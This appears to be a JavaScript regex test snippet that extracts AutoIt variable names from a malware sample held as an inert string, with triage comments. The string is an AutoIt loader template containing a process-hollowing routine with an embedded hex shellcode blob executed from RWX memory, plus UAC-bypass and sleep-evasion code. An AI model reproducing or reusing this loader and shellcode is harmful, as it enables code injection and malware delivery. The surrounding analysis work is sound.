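// Matches AutoIt-style variable names: a literal `$` followed by one or more
// ASCII letters, digits or underscores.
// The `$` has to be escaped. Unescaped it is the end-of-line anchor (because of
// the `m` flag), and no word character can follow a line end, so the pattern
// could never produce a match.
const regex = /\$[a-zA-Z0-9_]+/gm;
// Alternative syntax using RegExp constructor
// (the backslash is doubled so that it survives the string literal)
// const regex = new RegExp('\\$[a-zA-Z0-9_]+', 'gm')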
// Test input for the regex: the text of an AutoIt loader script, held as an
// inert string. This snippet never runs it; the only use of `str` in this file
// is as the subject of `regex.exec`.
// Each `\$` below is an escaped dollar sign, so the string contains a literal `$`.
// Triage notes: the `Hollowing` function concatenates a hex blob piece by piece,
// writes it into memory returned by VirtualAlloc with protection 0x40
// (PAGE_EXECUTE_READWRITE) and calls into it through DllCallAddress.
// Most local variable names look randomised, so names extracted by the regex are
// probably weak indicators on their own - TODO confirm against other samples.
// NOTE(review): `%INJECTION%` and `%OPT%` look like builder placeholders, which
// suggests this is a template rather than a deployed script - confirm.
const str = `Execute("Opt(""TrayIconHide"", 1)")
;~ Call("CustomAntiVM")
;~ Call("CustomAntiSandbox")
;~ Call("CustomDelay")
;~ Call("CustomStartup")
;~ Call("CustomDownloader")
;~ Call("CustomUACBypass")
Global \$ProcessId
Global \$XWNFIUYHFDUH = Execute('%INJECTION%')
Call("Hollowing",\$XWNFIUYHFDUH, "", GetResources())
;~ Call("CustomMeltFile")
;~ Call("CustomPersistence")
Func Hollowing(\$wPath, \$wArguments, \$lpFile)
Local \$ojnkoeyrcwxlutoux = "0x558BEC8B4D088BC180390074064080380075FA2BC15DC20400558BEC56578B7D0833F657E8D7FFFFFF8B"
Local \$kxghsiqvahwxnq = \$ojnkoeyrcwxlutoux & "C885C974200FBE07C1E60403F08BC625000000F0740BC1E81833F081E6FFFFFF0F474975E05F8BC65E5D"
Local \$sdqpidmqtyxkecrfsp = \$kxghsiqvahwxnq & "C20400558BEC51515356578B7D0833F68B473C8B44387803C78B50208B581C03D78B482403DF8B401803"
Local \$wtzfkbwb = \$sdqpidmqtyxkecrfsp & "CF8955FC894DF889450885C074198B04B203C750E882FFFFFF3B450C74148B55FC463B750872E733C05F"
Local \$xonwcuofeidefqludikidnevpgau = \$wtzfkbwb & "5E5B8BE55DC208008B45F80FB704708B048303C7EBE9558BEC81ECF003000053565733FF897DB8648B35"
Local \$qntpthgycxwcvzxicnjfif = \$xonwcuofeidefqludikidnevpgau & "300000008B760C8B760C8B368B368B76188975B8897DC8648B35300000008B760C8B760C8B368B761889"
Local \$bbrnxjj = \$qntpthgycxwcvzxicnjfif & "75C88D45B4C78558FFFFFF793A3C07898520FFFFFF8BF78D45E8C7855CFFFFFF794A8A0B898524FFFFFF"
Local \$shvtuoronlyjnrglhmeqvsbwvl = \$bbrnxjj & "8D45B0898528FFFFFF8D45A489852CFFFFFF8D45C0898530FFFFFF8D4598898534FFFFFF8D45D4898538"
Local \$llryfjxokqaibkgtpblwvnuqjat = \$shvtuoronlyjnrglhmeqvsbwvl & "FFFFFF8D45A889853CFFFFFF8D45A0898540FFFFFF8D4590898544FFFFFF8D4594898548FFFFFF8D45C4"
Local \$tnzfzyidgxogpmyh = \$llryfjxokqaibkgtpblwvnuqjat & "89854CFFFFFF8D45AC898550FFFFFF8D45CCC78560FFFFFFEE38830CC78564FFFFFF5764E101C78568FF"
Local \$qlzltjbdzlyqxqbpfpdakkbj = \$tnzfzyidgxogpmyh & "FFFF18E4CA08C7856CFFFFFFE3CAD803C78570FFFFFF99B04806C78574FFFFFF93BA9403C78578FFFFFF"
Local \$shawavvjwgeejpajlvgozrfp = \$qlzltjbdzlyqxqbpfpdakkbj & "E4C7B904C7857CFFFFFFE487B804C74580A92DD701C7458405D13D0BC745884427230FC7458CE86F180D"
Local \$wzbzixxgjpsmjfddpp = \$shawavvjwgeejpajlvgozrfp & "898554FFFFFF8B45C883FE02FFB4B558FFFFFF0F4F45B850E842FEFFFF8B8CB520FFFFFF890185C00F84"
Local \$urmwfppupodnjbbkzbuvayjx = \$wzbzixxgjpsmjfddpp & "910300004683FE0E7CD28BDF6A108D45D84350895DFCFF55E86A448D85DCFEFFFF50FF55E868CC020000"
Local \$utwnzgscykxocatlkoiicwgrlzg = \$urmwfppupodnjbbkzbuvayjx & "8D8510FCFFFF50FF55E88B4D10C78510FCFFFF070001008B713C03F10FB74614897DF8897DBC8945D039"
Local \$bjtoviobltcuiva = \$utwnzgscykxocatlkoiicwgrlzg & "BEA0000000741139BEA40000007409F6461601750333FF4733D2897DF433C08955EC6639110F94C03D4D"
Local \$ozemhyijlmqavynfcazqtevbgoz = \$bjtoviobltcuiva & "5A00000F840E03000033C039160F94C03D504500000F84FC02000033C0663956040F94C03D4C0100000F"
Local \$hritzmbigny = \$ozemhyijlmqavynfcazqtevbgoz & "84E80200008D45D8508D85DCFEFFFF5052526A04525252FF750CFF7508FF55A485C00F84AD0200008D85"
Local \$ritzicfhsdx = \$hritzmbigny & "10FCFFFF50FF75DCFF55A085C00F84980200006A006A048D45BC508B85B4FCFFFF83C00850FF75D8FF55"
Local \$ozujehkdcgtyardsqotqhsd = \$ritzicfhsdx & "9485C00F84780200008B45BC3B4634750F50FF75D8FF55B085C00F85610200006A406800300000FF7650"
Local \$irxtwsvzvwjd = \$ozujehkdcgtyardsqotqhsd & "6A00FF55988BD885DB0F84450200006A406800300000FF7650FF7634FF75D8FF55C08945F885C0753B85"
Local \$izqhuxcksyjsifkptzmq = \$irxtwsvzvwjd & "FF0F84230200006A406800300000FF765033FFC745EC0100000057FF75D8FF55C08945F885C075146800"
Local \$wvlrhnnkhhxcrnutzgzsehlki = \$izqhuxcksyjsifkptzmq & "8000005753FF55C48B5DFCE9F501000033FFFF7654FF751053FF55B433C0897DF0663B4606732C8B7DD0"
Local \$elrig = \$wvlrhnnkhhxcrnutzgzsehlki & "83C72C03FEFF77FC8B07034510508B47F803C350FF55B48B4DF08D7F280FB7460641894DF03BC87CDC8B"
Local \$fwjshmnzzhkr = \$elrig & "7B3C8B45F803FB837DEC008947340F848A000000837DF4000F84800000008B97A00000008365F40003D3"
Local \$dlbgbukrqnzulokbidbwcbbbsy = \$fwjshmnzzhkr & "83BFA400000000766B8B420433C983E808894DF0A9FEFFFFFF76450FB7444A086685C0742B25FF0F0000"
Local \$ghfzgrimeajcdqgrpswogsclqwf = \$dlbgbukrqnzulokbidbwcbbbsy & "03028945EC8BC88B46342904198B4DF08B47340FB74C4A0881E1FF0F0000030A0104198B4DF08B420441"
Local \$npcjancoclqgimzkks = \$ghfzgrimeajcdqgrpswogsclqwf & "83E808894DF0D1E83BC872BB8B4DF4034A04035204894DF43B8FA4000000729533FF57FF765053FF75F8"
Local \$galpkljedrneujjluxcqj = \$npcjancoclqgimzkks & "FF75D8FF55D485C00F84FEFEFFFF8D459C506A02FF7654FF75F8FF75D8FF55CC85C00F84E4FEFFFF33C0"
Local \$oabegzlochissjwuxeqavj = \$galpkljedrneujjluxcqj & "897DF4663B4606736C8B7DD083C73C03FE8B07A900000020741985C079046A40EB172500000040F7D81B"
Local \$kbxqhwwr = \$oabegzlochissjwuxeqavj & "C083E01083C010EB1585C079056A0458EB0CA9000000406A00580F95C0408D4D9C5150FF77E48B47E803"
Local \$bitjszjlemxpbjembznrx = \$kbxqhwwr & "45F850FF75D8FF55CC85C074128B4DF483C7280FB7460641894DF43BC8729E33FF68008000005753FF55"
Local \$slpnfpagpsoslgayirw = \$bitjszjlemxpbjembznrx & "C485C00F845BFEFFFF576A048D45F8508B85B4FCFFFF83C00850FF75D8FF55D485C00F843CFEFFFF8B46"
Local \$klzedfibwlphj = \$slpnfpagpsoslgayirw & "280345F88985C0FCFFFF8D8510FCFFFF50FF75DCFF559085C00F841BFEFFFFFF75DCFF55AC85C00F840D"
Local \$etixewnk = \$klzedfibwlphj & "FEFFFF8B45E0EB1D8B5DFC33FF837DD800740757FF75D8FF55A883FB050F8677FCFFFF33C05F5E5B8BE5"
Local \$N1 = \$etixewnk & "5DC20C00"
Local \$lpShellcode = DllCall("kernel32", "ptr", "VirtualAlloc", "dword", 0, "dword", BinaryLen(\$N1), "dword", 0x3000, "dword", 0x40)[0]
Local \$File_Struct = DllStructCreate("byte lpfile[" & StringLen(\$lpFile) & "]")
BitAND(DllStructSetData(DllStructCreate("byte shellcode[" & BinaryLen(\$N1) & "]", \$lpShellcode), "shellcode", \$N1),DllStructSetData(\$File_Struct, "lpfile", \$lpFile))
\$ProcessId = DllCallAddress("dword", \$lpShellcode + "0xBE", "wstr", \$wPath, "wstr", \$wArguments, "ptr", DllStructGetPtr(\$File_Struct))[0]
EndFunc
;~ %OPT%
Func CustomUACBypass()
Local \$ejifuhzuieh = Execute(BinaryToString("0x497341646d696e2829"))
Local \$QSZUIEHZ = "WIN_10"
Local \$ONUHBFE = "WIN_7"
If Not \$ejifuhzuieh Then
Local \$QSDJSI = @OSVersion
If \$QSDJSI == \$QSZUIEHZ Then
CustomWin10Elevation()
ElseIf \$QSDJSI == \$ONUHBFE Then
CustomWin7Elevation()
EndIf
EndIf
EndFunc
Func CDEL(\$SLTIME,\$SLEOO)
For \$i = 0 To \$SLEOO
DllCall("kernel32.dll", "none", "Sleep", "dword", \$SLTIME/ \$SLEOO)
\$avar = 999
While \$avar == 999
\$avar = \$avar + 1 * \$avar - 1 ^ 405 + \$avar * \$avar
\$avar = 11200
WEnd
Next
EndFunc`;
// `regex` carries the `g` flag, so exec() resumes from `regex.lastIndex`.
// Reset it first if the regex object is shared with other code:
// regex.lastIndex = 0;
let m;
for (m = regex.exec(str); m !== null; m = regex.exec(str)) {
  // A zero-width match leaves lastIndex where it was; step past it so the
  // scan always advances and cannot loop forever.
  if (regex.lastIndex === m.index) {
    regex.lastIndex += 1;
  }
  // Index 0 is the full match; any later indexes are capture groups.
  for (const [groupIndex, match] of m.entries()) {
    console.log(`Found match, group ${groupIndex}: ${match}`);
  }
}